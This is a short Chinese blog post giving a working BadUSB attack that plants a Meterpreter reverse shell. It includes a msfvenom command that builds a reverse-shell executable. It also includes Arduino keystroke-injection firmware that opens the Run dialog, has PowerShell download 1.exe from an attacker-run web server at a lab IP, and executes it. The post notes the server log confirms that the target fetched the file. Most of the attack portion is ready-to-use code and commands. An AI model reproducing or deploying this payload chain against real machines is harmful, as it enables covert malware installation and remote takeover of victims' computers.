badusb_反弹meterpreter

转载请注明来自 b0t0w1’blog

本次思路是在本地生成 exploit，放在服务器上可供下载或者直接在本地搭建服务器。

生成 exploit：

msfvenom -p payload lhost=192.168.99.130 lport=4444 -f exe -o 1.exe

烧录payload：

char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.99.132/1.exe';$file = ' %HOMEPATH%\\1.exe ';$clnt.DownloadFile($url,$file);";
char *command2 = "%HOMEPATH%\\1.exe";
void setup() { 
    delay(5000);
    omg(command1);
    delay(10000);
    omg(command2);
 }

void loop() {}
void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  Keyboard.println(SomeCommand);
}

生成的exploit的ip和端口为监听机的地址及端口。
烧录的payload同样来自于kali set工具集，用杨依赖于powershell。需要注意以下几点：
1、commond1的命令是从指定ip（192.168.99.132）下载指定文件（1.exe），ip不一定是监听机，而是你搭建好的、存放着exploit的服务器ip
2、我在另一个虚拟机上搭建了web，上传1.exe，ip地址为192.168.99.132
3、默认下载的位置是在环境变量 HOMEPATH 的位置，command2就是运行exploit（第8行），第七行代码会延迟10妙供下载，可以根据实际改变。
监听选用meterpreter，

附服务器（192.168.99.132）的日志，确实有靶机的访问记录。

转载请注明来自 b0t0w1’blog